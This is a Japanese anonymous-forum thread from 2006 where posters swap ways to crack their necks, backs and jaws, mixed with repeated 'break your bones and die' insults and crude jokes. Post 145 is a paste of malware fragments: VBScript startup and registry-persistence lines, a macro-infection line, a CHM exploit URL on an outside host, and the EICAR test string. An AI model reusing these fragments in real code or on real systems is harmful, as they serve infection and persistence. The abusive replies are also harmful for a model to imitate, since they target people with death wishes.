この情報をコピペで佐賀スレに広めるんだこの情報をコピペで佐賀スレに広めるんだこの情報をコピペで佐賀スレに広めるんだ
この情報をコピペで佐賀スレに広めるんだこの情報をコピペで佐賀スレに広めるんだこの情報をコピペで佐賀スレに広めるんだ


32 :名無しの愉しみ:2006/10/22(日) 20:28:51 ID:y7imumFM
なにこのスレ

33 :名無しの愉しみ:2006/10/22(日) 22:18:28 ID:???
とりあえず佐賀佐賀うるさい奴の首根っこ、捻り砕いときますか。

34 :名無しの愉しみ:2006/10/22(日) 22:25:55 ID:???
賀厨UZEEEEEEEE


首ベキッボキッグシャァゴシャァ

35 :名無しの愉しみ:2006/10/22(日) 23:02:40 ID:izPpnZr7
みなさん腰を鳴らすときはどうやることが多いですか?
椅子に座って、背もたれをつかむようにしてゴキッってひねってるひと
多いよねw あと、床とかに座ってる時なにげに左右にひねる人ww
見かけると、ああ誰でも鳴らしてるんだ!て嬉しくなるよ?!


36 :名無しの愉しみ:2006/10/22(日) 23:26:09 ID:???
人がなにげに首や腰ひねって鳴らしてるの見ると無性にうれしくなるよな〜しかも音まで聞こえると最高!

俺のカテキョの先生は俺が問題解いてる間よく腰をボキボキ鳴らすんだよな〜気になって全く集中できん…

37 :名無しの愉しみ:2006/10/23(月) 04:08:01 ID:???
>>35-36
骨折って死ね

38 :名無しの愉しみ:2006/10/23(月) 12:34:50 ID:???
お前がなw

39 :名無しの愉しみ:2006/10/23(月) 12:45:15 ID:???
ペキ

40 :名無しの愉しみ:2006/10/23(月) 12:48:22 ID:???
>>38-39
骨折って死ね

41 :名無しの愉しみ:2006/10/23(月) 14:51:06 ID:???
お前がなw

42 :名無しの愉しみ:2006/10/23(月) 15:27:37 ID:???
>>41
骨折って死ね

43 :名無しの愉しみ:2006/10/23(月) 15:37:44 ID:oHLTMv0T
>>37>>40>>42
骨折って死ね 

44 :名無しの愉しみ:2006/10/23(月) 16:50:48 ID:ovuTsCnR
>>43

45 :名無しの愉しみ:2006/10/23(月) 17:01:59 ID:???
>>43-44
骨折って死ね

46 :名無しの愉しみ:2006/10/23(月) 17:13:30 ID:???
指では同一関節を1日10回程度、1ヶ月続て指を鳴らすと、炎症をおこし関節が太くなってくる。
触ると硬く骨が太くなった様に思われるがX線写真で見ると、骨は太くなっていない。
化骨も見えない(骨が傷つくと修復のため出る薄い骨)太く硬い部分は軟骨が主体となっている。

60歳男性40年間、左小指先端関節と下の基節・中節関関節を1日10回以上鳴らすクセがあり太くなっている
http://www5.ocn.ne.jp/~yotu/image/kansetu/yubi_x1.gif


・・・でもやめられないのSA!!

47 :名無しの愉しみ:2006/10/23(月) 17:29:32 ID:???
>>46
骨折って死ね

48 :名無しの愉しみ:2006/10/23(月) 17:48:33 ID:???
>>47
骨折って死ね


49 :名無しの愉しみ:2006/10/23(月) 17:56:57 ID:???
「骨折って死ね」をNGワード登録しとこう。

50 :名無しの愉しみ:2006/10/23(月) 18:00:39 ID:???
>>48-49
骨折って死ね

51 :名無しの愉しみ:2006/10/23(月) 19:03:50 ID:???
おまいらいい加減にせい!

52 :名無しの愉しみ:2006/10/23(月) 19:36:43 ID:???
>>51
骨折って死ね

53 :名無しの愉しみ:2006/10/23(月) 20:03:03 ID:???
荒らしは無視して骨鳴らそうぜ。

54 :名無しの愉しみ:2006/10/23(月) 20:09:26 ID:???
ペキ

55 :名無しの愉しみ:2006/10/23(月) 20:10:33 ID:???
>>53-54
骨折って死ね

56 :名無しの愉しみ:2006/10/23(月) 21:26:15 ID:???
パキ

57 :名無しさん:2006/10/23(月) 22:10:53 ID:???
骨折を折って死ね!

58 :名無しの愉しみ:2006/10/23(月) 22:14:09 ID:???
ボキボキきもちい〜

59 :名無しの愉しみ:2006/10/23(月) 22:24:02 ID:???
ベリベリ

60 :名無しの愉しみ:2006/10/23(月) 22:50:55 ID:ovuTsCnR
>>57-59
骨折って死ね

61 :名無しの愉しみ:2006/10/23(月) 23:04:11 ID:???
>>56,60
骨折って死ね

62 :名無しの愉しみ:2006/10/23(月) 23:14:16 ID:oSS8x78r
ゴキッ

63 :名無しの愉しみ:2006/10/23(月) 23:16:28 ID:KgLlDbYh
パッキーン

64 :名無しの愉しみ:2006/10/23(月) 23:16:31 ID:???
>>62
骨折って死ね

65 :名無しの愉しみ:2006/10/23(月) 23:17:40 ID:???
>>63
骨折って死ね

66 :名無しの愉しみ:2006/10/23(月) 23:25:20 ID:l91Z4AiS
バキッよりゴキッより
グシャッってのがキモチイイ(*´∀`)

67 :名無しの愉しみ:2006/10/23(月) 23:26:18 ID:???
>>66
キモイ一時も早く骨折って死ね

68 :名無しの愉しみ:2006/10/23(月) 23:33:35 ID:???
グシャがいいよな

69 :名無しの愉しみ:2006/10/23(月) 23:36:04 ID:???
>>68
骨折って死ね


70 :名無しの愉しみ:2006/10/23(月) 23:36:48 ID:???
恍惚のバキコン

71 :名無しの愉しみ:2006/10/23(月) 23:43:31 ID:???
ゴクッ

72 :名無しの愉しみ:2006/10/23(月) 23:51:18 ID:???
ボグッ

73 :名無しの愉しみ:2006/10/24(火) 00:04:49 ID:WYF4XqZ0
ふにゃ〜


74 :名無しの愉しみ:2006/10/24(火) 00:04:50 ID:???
ポキャーw

75 :名無しの愉しみ:2006/10/24(火) 00:50:15 ID:???
首ボキョッベキョッバキョッグシャァゴシャァ!!!!!!!!!!!

76 :名無しの愉しみ:2006/10/24(火) 00:58:14 ID:???
首や腕をまわすと肩とかの骨がゴリゴリ音たてて気持ちE

77 :名無しの愉しみ:2006/10/24(火) 01:00:41 ID:y9or+ji9
風呂場で骨鳴らすと反響音がしてイイ
(いわゆるフラッターエコーってやつです)

78 :名無しの愉しみ:2006/10/24(火) 03:34:17 ID:???
やっぱ首だよね

79 :名無しの愉しみ:2006/10/24(火) 09:32:48 ID:???
背骨もなかなか気持ちいいんだぜ?

80 :名無しの愉しみ:2006/10/24(火) 12:46:06 ID:Dm3Iaqv8
>>70-79
骨折って死ね

81 :名無しの愉しみ:2006/10/24(火) 13:38:12 ID:???
>>80
ちんこの骨折って死ね。

82 :名無しの愉しみ:2006/10/24(火) 13:50:18 ID:Dm3Iaqv8
>>80
ちんこの骨折って死ね。

83 :名無しの愉しみ:2006/10/24(火) 13:51:12 ID:???
>>82
包茎はチンコ輪切りにして死ね。

84 :名無しの愉しみ:2006/10/24(火) 18:46:55 ID:???
>>83
ちょwwそれ勘弁www

85 :名無しの愉しみ:2006/10/24(火) 18:47:56 ID:???
ちんこに骨はありませんので・・・

86 :名無しの愉しみ:2006/10/24(火) 19:35:29 ID:???
チンポキとか

87 :名無しの愉しみ:2006/10/24(火) 22:23:11 ID:???
首ボキや腰ボキしたエネルギーで発電できないかな。
鳴らしただけではもったいない

88 :名無しの愉しみ:2006/10/24(火) 22:53:38 ID:???
それはすごい発明だ

89 :名無しの愉しみ:2006/10/25(水) 10:32:09 ID:HHEIcI8R
だができるわけがない事実

90 :名無しの愉しみ:2006/10/25(水) 11:08:24 ID:???
>>87
骨鳴らし否定論者によると物凄いエネルギーが発生しているらしいから、是非とも有効利用すべきだなW

91 :名無しの愉しみ:2006/10/25(水) 11:32:27 ID:QFSCCVjU
俺のポキポキやってるサウンドをポッキーの宣伝に使ってほしい。

92 :名無しの愉しみ:2006/10/25(水) 18:01:55 ID:v8oZ3/ww
>>85-91
骨折って死ね

93 :名無しの愉しみ:2006/10/25(水) 19:01:30 ID:???
宮神学園極 !::/:∧    ,, == アッー  ̄::::、゙丶 ',::::j ==ュ  r== 〈::::::j
<丶`∀´>   !/ |::::\  〃/´:::ヽ       {こ:::::丶ヽfヾ}, ィ赱、 i i r赱ミ  l:イ
 くやしい・・・丶レ  |::/\ !i い:: ::}      丶::::::::::} lと',  `"" ,l l `""  ,リぅ!
  <丶`∀´>  \レ ノヘ丶、 ー- '       ` ̄ ヽ-ヘ  ,ィ''。_。ヽ、  /_ン'
\  でも・・・   \_ ヽ:|⊂⊃   '  かーわいーー♪', / _lj_ }  ,'
  丶  <丶`∀´>  ` ┤        _,. -- 、   /...l、 ^' ='= '^ /!
B型(笑)  \(^o^)/  ヽ( ´∀`)<ほすほす!イ'百姓「すっかり忘れられとるのぉ」
ν速終わったな .@wぷ//  カキカキタタタッ。ヘ(;・・)ノ |     / .|  /.../       |
ビアンカ>>>..  -―口==ミヘ、...プチエンジェル ̄ ̄//  ./  / .../   / ̄ ̄|. l
>>>>フローラ\軽でデートに`゙へ、        //  .. /  / .../   /.  / /
使える魔法ゼロのル| 男でMTって恥 `ー Y/  //   .. /  / .../    ̄ ̄ /
俺に魅了の魔法/ ̄ かっこつけたい、,    || //そうか /  /  / / ̄ ̄ ̄ ̄というAA
      ハ_ハ,,;f::::::::::::::::::::::ヽ  タバコ ヽ   ||//     /( ●) (●)\^o^|見ただけでニュー
なおるよ('(゚∀゚∩::::/'" ̄ ̄ヾi ヽ    」  //妊娠脂/::::::⌒(__人__)⌒: \この板は間違いなく
      ヽ  〈|::::| ,,,,,_  ,,,,,,|  /::::::ヽ―ヽ -=o=-_ |     |r┬-|     |
禿同    ヽヽ_)|r=( 。);( 。) |○/ 。  /:::::::::  (: \      `ー'´     /
でもまあ、ゲームのためだけにD::::人__人:::::○ だからニュー速でやるお!
PSPがあれば、PS2並のゲームヽ   __ \国分「竹原さん、スレタイにない気分はどう?」
音楽だってMP3じゃなくてATRA \  | .::::/.|051.jpg |    ( ●)(●)
ト、ニ| <でiンヽ  ;'i"ィでiン |三.|  \lヽ::::ノ  地震    |     (__人__)この馬鹿はsakuだな
', iヽ!  、 ‐' /  !、 ーシ |シ,イ 画像も貼らずに     |     ` ⌒´ノ 常識的に考えて・・・

94 :名無しの愉しみ:2006/10/25(水) 22:25:21 ID:Zr8Qey9w
>>90
たかが手指を曲げるだけのエネルギーなんて大したことは無いだろう。
狭い関節に集中するから破壊力は大きいかもしれないが。

と、理系の漏れがマジレス。

95 :名無しの愉しみ:2006/10/25(水) 22:49:22 ID:???
>>まんこの(ry

96 :名無しの愉しみ:2006/10/26(木) 00:22:41 ID:???
これだから理系は・・・

97 :名無しの愉しみ:2006/10/26(木) 00:37:17 ID:???
バキバキ鳴る音って、関節内轢音って言うんだね・・・知らんかった。

ttp://ryuta.blog.tennis365.net/archives/article/5888.html

> しょっちゅうコキコキやっている人は空気の道が出来ていて
> 簡単に音を鳴らせるのかもしれません。

俺、めっちゃ空気の道があるんだろうなw

98 :名無しの愉しみ:2006/10/26(木) 09:21:25 ID:???
首も手も鳴る仕組みは一緒だろ?

99 :名無しの愉しみ:2006/10/26(木) 11:54:26 ID:???
あなたもわたしもポッキポキ

100 :名無しの愉しみ:2006/10/26(木) 12:03:29 ID:???
それを言うならボッキーだろうが
俺の黒コブラも勃起ー!

101 :名無しの愉しみ:2006/10/26(木) 14:41:52 ID:???
それは違う

102 :名無しの愉しみ:2006/10/26(木) 18:31:10 ID:???
モキャ…

103 :名無しの愉しみ:2006/10/26(木) 22:42:25 ID:???
ミシ…
うむ。実に気分が悪い。

104 :名無しの愉しみ:2006/10/27(金) 02:13:26 ID:???
ボキバキグシボキバキグシャボキバキグシャボキバキグシャボキバキグシャボキバキグシャボキバキグシャボキバキグシャ

あ〜快感

105 :名無しの愉しみ:2006/10/27(金) 02:56:21 ID:???
体中の全ての関節を、新品のものと交換したい

106 :名無しの愉しみ:2006/10/27(金) 09:58:11 ID:???
首ベキッボキッグシャァゴシャァ

107 :名無しの愉しみ:2006/10/27(金) 12:30:27 ID:???
週マガのゴッドハンド輝で骨ボキの話やってたな
ラップ音はねーよw

108 :名無しの愉しみ:2006/10/27(金) 21:31:27 ID:???
週間骨ボキ創刊!!
創刊号は首の間接模型付き!!
毎号集めて人体模型を完成させよう!!
創刊号は290円

デアゴスティ〜ニ♪

109 :名無しの愉しみ:2006/10/28(土) 15:57:08 ID:???
勃起簿記ボキage♪

110 :名無しの愉しみ:2006/10/28(土) 16:00:13 ID:tUIvJJDh
代理ageボキ

111 :名無しの愉しみ:2006/10/28(土) 17:09:15 ID:JlrNF/fT
http://www.freepe.com/ii.cgi?gmmd

HP作りました

112 :名無しの愉しみ:2006/10/28(土) 20:53:39 ID:???
>>111
怖くて見れない。誰か勇気ある人見てw

113 :名無しの愉しみ:2006/10/28(土) 21:08:19 ID:D68RLX7d
>>112
俺は>>111見たが、特に怖がる必要もない。

114 :名無しの愉しみ:2006/10/29(日) 02:04:31 ID:???
ボキage@パンツ1枚で

115 :名無しの愉しみ:2006/10/29(日) 10:44:16 ID:???
ボッキボッキ

116 :名無しの愉しみ:2006/10/29(日) 11:36:52 ID:ucGgJO9D
あがってねえよカス

117 :名無しの愉しみ:2006/10/29(日) 14:03:16 ID:???
ボッキーンAGE

118 :名無しの愉しみ:2006/10/29(日) 16:39:00 ID:7lK3+Zac
足首が最近気持ちいい。
大きく引っかかる感じでボッキイィィ・・・!って鳴る。
鳴った後ジンジンした感じもまた良い。

119 :名無しの愉しみ:2006/10/29(日) 21:14:36 ID:???
年を取ると若い頃よりも関節間の液が減るせいだろうか、鳴りが悪くなって来た。

120 :名無しの愉しみ:2006/10/30(月) 00:16:25 ID:???
何歳?

121 :名無しの愉しみ:2006/10/30(月) 00:51:49 ID:???
>>120
72歳

122 :名無しの愉しみ:2006/10/30(月) 02:16:02 ID:???
>>120
そろそろ40歳。
10〜20代の頃のようなポキッという綺麗な音が出にくくなった。

123 :名無しの愉しみ:2006/10/30(月) 02:17:09 ID:???
背中鳴らすのが好き
ヘタクソに踏まれて痛い思いしてから、自分で鳴らすこと覚えた

124 :名無しの愉しみ:2006/10/30(月) 03:56:04 ID:???
どうやって鳴らすの?

125 :名無しの愉しみ:2006/10/30(月) 04:13:47 ID:BkzA59t/
家で自由に大迫力の映画が見たい!
ねっころがったり、わんわん泣いたり・・・そのためのサイトです。
http://carefree-nizi.hometheater.11myroom.com/index.html

126 :名無しの愉しみ:2006/10/31(火) 14:52:53 ID:???
ちょっと趣旨からは外れますが、
みなさん脱臼に興味(?)はないですか?
どんな音するんでしょうかね。

127 :名無しの愉しみ:2006/11/01(水) 02:01:05 ID:???
>>126
痛いだけだろ… 常識的に考えて…

128 :126:2006/11/01(水) 11:02:48 ID:???
ごめんなさい。

129 :名無しの愉しみ:2006/11/02(木) 00:05:38 ID:???
>>124
>>123ではないけど、私はちょっと意識して呼吸する(深呼吸?)と背骨がボキッとなる。

あとは背中を丸める姿勢をした後に手を組んでエビ反りするとゴキボキバキッ!

130 :名無しの愉しみ:2006/11/02(木) 00:44:14 ID:PP97fw84
会社でいつも座っているイスは背もたれが首筋くらいまであるので、背骨ボキできない(;´Д`)
客先でコソーリやるか、帰宅した後思いっきりやるのだが、これがもう痺れるくらい快感(*´∀`)

131 :名無しの愉しみ:2006/11/02(木) 07:19:35 ID:???
寝起きボキボキAGE

132 :名無しの愉しみ:2006/11/02(木) 11:28:37 ID:???
指は第一関節から3箇所鳴るし、親指も付け根から3箇所。
首が一番爽快。バキバキバキポキパキっと。
足の付け根もボクっと低くてでかい音が鳴るから好き。
手首は鳴らすために頬杖つく。
一時期耳の穴の手前のポコっと出てる骨を指で押さえて、押す方向と同じ方に顎をずらすと顎がバキっと鳴ってた。
今は痛いし鳴らなくなっちゃった。

次は足首かなー気持ちよさそう

133 :名無しの愉しみ:2006/11/02(木) 11:36:00 ID:???
>>129
エビ反りで背骨鳴らしているのか…

よくそれで鳴らせるな…
と感心してしまった。




俺の場合は、一気に体を捻じ曲げて鳴らしている。

背骨ボキボキィ!!!!!!!!!!!

134 :名無しの愉しみ:2006/11/02(木) 17:10:50 ID:???
>>132
>一時期耳の穴の手前のポコっと出てる骨を指で押さえて、
>押す方向と同じ方に顎をずらすと顎がバキっと鳴ってた。

俺は出来るけど、他にこれが出来る人に会った事が無い。
だから人からはどんな音で聞こえてんのか聞いてみたい。

135 :名無しの愉しみ:2006/11/02(木) 18:51:45 ID:8zXCnEPD
背骨鳴らすには学校のイスが一番だな!
ボキボキボキボキボキボキボキボキボキボキボキボキボキボキボキボキボキ〜

136 :名無しの愉しみ:2006/11/03(金) 00:10:49 ID:P5PA/iX+
 首を反らして鳴らしてみた。横に倒したら鳴らないであろうところが鳴った

137 :名無しの愉しみ:2006/11/03(金) 20:33:41 ID:vTlaVBkZ
顔を右に向けて、右手で左顎をグッって押すとすごい鳴るね
ガッゴッゴッゴッゴッ!
気持ち〜

138 :名無しの愉しみ:2006/11/03(金) 20:57:52 ID:QC+eKcXb
どこが鳴るの?首?顎?

139 :名無しの愉しみ:2006/11/03(金) 23:11:42 ID:+ODR7ImU
”ありがとう”心から・ひょうごから

  のじぎく兵庫国体 2006


マスコットキャラ はばタン

140 :名無しの愉しみ:2006/11/04(土) 01:21:33 ID:???
ttp://www.nishimoto-chiro-lab.com/tokucyou.html

> モビリゼーションで動かない関節に高速(スピーディー)な矯正をします。
> ボキボキと音がなることがあります。
> 必要な方のみ行なっておりますので、ボキボキなるのがいやな方は申し出てください。


いえ、もう、どんどん鳴らしてくださいw

141 :名無しの愉しみ:2006/11/04(土) 08:58:40 ID:rUY/iI8I
>>138


142 :名無しの愉しみ:2006/11/04(土) 11:39:32 ID:???
うぉ〜背中が苦しい〜

胸椎ボキボキしたい!!!!



だが鳴らせない…orz

143 :名無しの愉しみ:2006/11/04(土) 11:42:50 ID:???
脊椎ボキボキ気持ちいい〜

144 :名無しの愉しみ:2006/11/04(土) 14:57:33 ID:2JVV0FCr
背骨は人に鳴らしてもらわなきゃ鳴らないorz

145 :名無しの愉しみ:2006/11/04(土) 15:59:35 ID:5Rncu4hS
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
???????

146 :名無しの愉しみ:2006/11/04(土) 18:24:09 ID:???
寝起きに階段降りてたら、足のアーチ状の骨とかアキレス健付近とかペキペキ鳴ってわろすw

147 :名無しの愉しみ:2006/11/04(土) 20:49:41 ID:QmAbMCLk
ヤフーの動画で、「整体」で検索すると
ボディコン倶楽部という番組がある。
そこでボディコンのおねーちゃんがボキボキされてるのが見られる。
ボキ聴きラーにはたまらん番組です。
ボキ聴きラーの方にはおすすめ!

148 :名無しの愉しみ:2006/11/04(土) 20:55:35 ID:???
>>147
ただいま視聴中
なんか雰囲気が昭和っぽいなw

149 :名無しの愉しみ:2006/11/04(土) 21:28:07 ID:???
>>147
GJ!
めっちゃ楽しんできた

150 :名無しの愉しみ:2006/11/04(土) 21:41:06 ID:1zpxg3NL
たまに骨鳴らして気持ちよかったら勃起しない?
俺だけかな・・・・

151 :名無しの愉しみ:2006/11/04(土) 22:31:31 ID:???
>>150
まさに勃起ボキだなw

152 :名無しの愉しみ:2006/11/05(日) 15:01:46 ID:???
恥骨鳴らしでなら勃起する。

153 :名無しの愉しみ:2006/11/07(火) 00:44:46 ID:AaINwn8I
ようつべに首ポキ動画ありました!
残念なのは効果音なこと。

http://www.youtube.com/watch?v=KvIym3569sE

154 :名無しの愉しみ:2006/11/07(火) 10:17:15 ID:???
何故か朝起きた後だと、関節が鳴りやすいんだよな…

今日も首をおもいっきり鳴らしてしまったぜ。

首ボキボキッグシャァミシッゴシャァー!!!!!!

155 :名無しの愉しみ:2006/11/07(火) 22:40:31 ID:XTpjHo3p
人大杉。
ポキ人気?

156 :名無しの愉しみ:2006/11/07(火) 22:47:17 ID:TDbU4h4Z
http://45.xmbs.jp/analisuku/
荒らし専門。
荒らしてやるよ?

157 :名無しの愉しみ:2006/11/08(水) 15:29:02 ID:???
背骨〜首はあまりにやヴァそうなんで半年近く控えてたら鳴らなくなった。
本当にならなくなるんだなぁ。
変わりに手軽かつ回復も早く適度にきもちいい親指の付け根〜足首〜ヒザをやってる。
親指の付け根と足首は通勤中も常にやってたんだけど、
こないだ数日間続くほど痛くなった。炎症だろうか・・。

158 :シナ王( `ハ´) ◆FMcqrPFD.U :2006/11/08(水) 18:49:39 ID:udjCezKA
            ___
       /      \
      /ノ  \   u. \ !?
    / (●)  (●)    \
    |   (__人__)    u.   |
     \ u.` ⌒´      /
    ノ           \
  /´               ヽ
 |    l              \
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))

159 :名無しの愉しみ:2006/11/09(木) 02:28:33 ID:???
>>153
消されてる〜・・・

160 :名無しの愉しみ:2006/11/10(金) 06:09:22 ID:I6+dIrx2
カイロプラクティック行ったら鳴らしてくれんのかな?

161 :名無しの愉しみ:2006/11/10(金) 08:25:01 ID:???
>>160
鳴らしてくれる所と鳴らさない所がある。

162 :名無しの愉しみ:2006/11/10(金) 18:00:30 ID:I6+dIrx2
>>161
行ったことあるの?

163 :名無しの愉しみ:2006/11/10(金) 20:52:03 ID:???
>>162
あるよ

164 :名無しの愉しみ:2006/11/11(土) 10:39:36 ID:hvoPlsQ5
>>162
鳴らしてくれるとこって、どんくらい鳴らしてくれんの?

165 :名無しの愉しみ:2006/11/11(土) 11:02:32 ID:OPRJtNMu
>>164
162に聞いても知らないんだから意味無いだろ

166 :名無しの愉しみ:2006/11/12(日) 02:04:15 ID:YLeCWsr5
間違えた!
>>163だった!

167 :名無しの愉しみ:2006/11/14(火) 03:16:35 ID:qPjO2QYC
誰か背骨の鳴らし方詳し〜く教えてくれないかなあ

168 :名無しの愉しみ:2006/11/14(火) 10:33:46 ID:???
ググれボケ

169 :アゴは控えめ:2006/11/14(火) 14:21:05 ID:???
初カキコ、よろ。
俺も良く鳴る方だが、アゴが鳴るのはチョイ良くない、正直。
歯医者(口腔外科!)に虫歯の治療中、訊いてみた。師曰く
「アゴが鳴るのは珍しくない。だが、片方のアゴが動きづらくなって、
 綺麗にア〜ンって出来なくなるかもネ。顎関節症とは違いますから安心を」
とのこと。それから俺はアゴだけは“控えめ”に鳴らしてますw


170 :名無しの愉しみ:2006/11/15(水) 08:26:08 ID:HFHzvBCH
あっそ 顎外して死ね

171 :名無しの愉しみ:2006/11/15(水) 11:51:28 ID:nZblGcxA
>>169
なんでメール欄にageって入れてるの?
何の意味もないよ、馬鹿?

172 :名無しの愉しみ:2006/11/15(水) 12:20:55 ID:???
>>171
ID隠れるよ。馬鹿?

173 :sage:2006/11/15(水) 13:12:25 ID:nZblGcxA
なら尚更sageろと言いたくなるのは俺だけじゃないはず

174 :名無しの愉しみ:2006/11/15(水) 18:02:12 ID:HFHzvBCH
sageはメール欄へ

175 :名無しの愉しみ:2006/11/15(水) 22:16:56 ID:mVxeaT71
>>170
ヤケに冷たいね

176 :名無しの愉しみ:2006/11/16(木) 09:45:14 ID:???
ボキボキage

177 :名無しの愉しみ:2006/11/16(木) 17:28:02 ID:???
ボキボキsage!

178 :名無しの愉しみ:2006/11/16(木) 19:51:49 ID:???
ボキボキhage!

179 :名無しの愉しみ:2006/11/17(金) 02:53:22 ID:???
ボキボキmange!

180 :名無しの愉しみ:2006/11/17(金) 09:48:43 ID:smWTAP5l
>>171
意図的にこのスレをageたいという意思表示。

181 :age:2006/11/18(土) 21:52:03 ID:???
>>180正解
age

182 :age:2006/11/18(土) 22:50:42 ID:???
( ; ゜Д゜)

183 :名無しの愉しみ:2006/11/19(日) 09:30:39 ID:09WSPJ2r
最近過疎っ照男:*::*:

184 :名無しの愉しみ:2006/11/19(日) 12:44:43 ID:???
関節鳴らす人少なくなったのかなぁ…







ってそんなワケ無いよな?こんなに気持ちいいのに

ボキボキグシャァゴシャァッ

185 :名無しの愉しみ:2006/11/19(日) 23:59:16 ID:???
拳を作り、人差し指とか親指がある面を、背中にあてる。
ちょうどみぞおちを貫通させたあたりにあてる。
そのまま、仰向けに寝る。背中の力はできるだけ抜いてゆっくりと。
拳に体重がかかると、背中がポキグシャ。拳の位置を少しずつずらし、
腰の方までもっていくと三カ所ぐらい鳴るポイントがある。

186 :名無しの愉しみ:2006/11/20(月) 04:02:36 ID:???
>>185
それしたら手が鳴った。
肝心の背骨がならないよ〜

187 :名無しの愉しみ:2006/11/20(月) 06:09:09 ID:???
>>185 身体が硬いので、拳が背中のみぞおちの位置まで曲がりませんでしたw

188 :名無しの愉しみ:2006/11/20(月) 07:45:03 ID:???
まぁ鳴らし方を教えてもらったとしても鳴る鳴らないは個人差だからなぁ・・・

189 :名無しの愉しみ:2006/11/20(月) 09:20:13 ID:I2wRzq1w
自分は小学校4年生くらいから首や腰がゴリゴリ鳴り始めた。
みんなはいくつぐらいからですか?

190 :名無しの愉しみ:2006/11/20(月) 17:19:54 ID:???
小学1年生の時に指がポキポキ鳴り始めた。
友達とファミコンやってて手が疲れたら鳴らしてた。気持ち悪いって言われた。
首が鳴り出したのは小2の時。水泳の準備体操の時に首をひねったらポキッと。 

小学校5年の時の運動会のビデオテープが出てきて、うわ懐かしーと思って再生。
体育座りをしながら腰をひねってボキボキしている当時の俺を見た時はorzってなった。

191 :名無しの愉しみ:2006/11/20(月) 19:51:31 ID:0HgmA96D
気持ち悪いからと仕事の先輩に止められている

無理なので居ない隙にバキボキやっている
やめられるかっての

192 :名無しの愉しみ:2006/11/20(月) 20:25:36 ID:???
みんな早いな。おれは手首腰が中学3年んときからで、背中は高校の柔道の時間にふざけてて背中鳴らされてからだ

193 :名無しの愉しみ:2006/11/21(火) 01:17:10 ID:yjR41df3
http://www.e-massage.net/iken.html
ここの1番上。
局内でこんな格好・・・

194 :名無しの愉しみ:2006/11/21(火) 15:56:13 ID:???
ガ−(゜Д゜;)-ン!

195 :名無しの愉しみ:2006/11/22(水) 03:34:28 ID:???
タイ語の字幕スーパーが何で大阪弁なん?

196 :名無しの愉しみ:2006/11/22(水) 20:43:19 ID:???
みんな一日で一番鳴らしてる場所ってどこ?
私は両手首で、右ひねり、左ひねり、関節曲げの3種が鳴るし、すぐにボキ成分が復活するからお気に入りで1日に5回は鳴らしてる


197 :名無しの愉しみ:2006/11/22(水) 21:28:09 ID:VODr9xlY
漏れは右人差し指

198 :名無しの愉しみ:2006/11/22(水) 21:29:24 ID:???
>>193
このスレ的には、見所は1分40秒付近だな

199 :名無しの愉しみ:2006/11/23(木) 02:54:42 ID:???
>>193
エロいなーw

200 :名無しの愉しみ:2006/11/23(木) 15:30:58 ID:NMID3CJe
 2 0 0

201 :名無しの愉しみ:2006/11/23(木) 16:39:09 ID:???
ボキ分っていうのは結局は気圧のことだっけか。

202 :名無しの愉しみ:2006/11/23(木) 20:46:14 ID:???
>>193
エロスwww誰?

203 :名無しの愉しみ:2006/11/24(金) 12:50:05 ID:bs7iCRYP
一番よく鳴るのが手の指だけど。気持ちいいのが首。

204 :名無しの愉しみ:2006/11/25(土) 13:34:15 ID:???
やっぱり一番は首ってことで

205 :名無しの愉しみ:2006/11/25(土) 15:42:47 ID:???
あちきは、背骨(背中)

206 :名無しの愉しみ:2006/11/25(土) 15:55:38 ID:cRdxJ3jX
これ癖って言うか指は鳴らさないと自由に動かなくね?

207 :名無しの愉しみ:2006/11/25(土) 17:45:29 ID:RUv13Lmr
俺の彼女 癖で暇さえあれば足指(小指か薬指)ボキボキ鳴らす うるさいorz

208 :名無しの愉しみ:2006/11/25(土) 23:45:23 ID:Pdwwu6zp
>>206
同意、何か固められたような感じがする。
>>207
ぽきで応酬するべし

209 :名無しの愉しみ:2006/11/26(日) 05:22:30 ID:???
>>193

夏目ナナ

210 :名無しの愉しみ:2006/11/26(日) 09:44:08 ID:qSUHWq8x
寝起きの背骨ポキは最高

211 :名無しの愉しみ:2006/11/27(月) 04:03:23 ID:orf9ecrR
運動の後の首グシャは幸せ

212 :名無しの愉しみ:2006/11/27(月) 17:03:32 ID:TWg6hshy
俺も好きでポキポキするけど、あれって医学的にどーなんだろ?
よく親に関節太くなるから止めろといわれたけど。

213 :名無しの愉しみ:2006/11/27(月) 19:02:01 ID:vKYEpEBF
朝一番の首ボッキンの為に生きてます

214 :名無しの愉しみ:2006/11/27(月) 19:48:30 ID:???
>>213
そしていつかそれが原因でアボーンするとw

215 :名無しさん:2006/11/27(月) 20:07:10 ID:???
それでもやめられない。
クスリといっしょだな。



首グシャやめますか?
人間やめますか?

216 :名無しの愉しみ:2006/11/28(火) 04:48:48 ID:???
オレはあまり長生きもしたくないので、早く死ぬるようにボキボキ鳴らしてます

217 :名無しの愉しみ:2006/11/28(火) 22:00:06 ID:aJUZ3RJR
このスレの住民の中でも股関節を鳴らしてる奴は中々いないだろう


218 :名無しの愉しみ:2006/11/28(火) 22:02:24 ID:vp6csGfA
>>217
ノシ

219 :名無しの愉しみ:2006/11/28(火) 22:06:33 ID:???
>>217
(゚∀゚)ノシ 股関節+股関節よりもっと奥の骨もグッと力入れると
ゴグって鳴るぞ!! 超快感w

220 :名無しの愉しみ:2006/11/28(火) 22:35:45 ID:OisxPMvm
駅、公園、デパート、図書館、映画館etc、いろいろな場所で
腰ひねってボキボキッとやってる人を見かけると、人間て、誰でも
オナラするのと同じで、どんな人でもボキボキするんだなあ…て
思うw


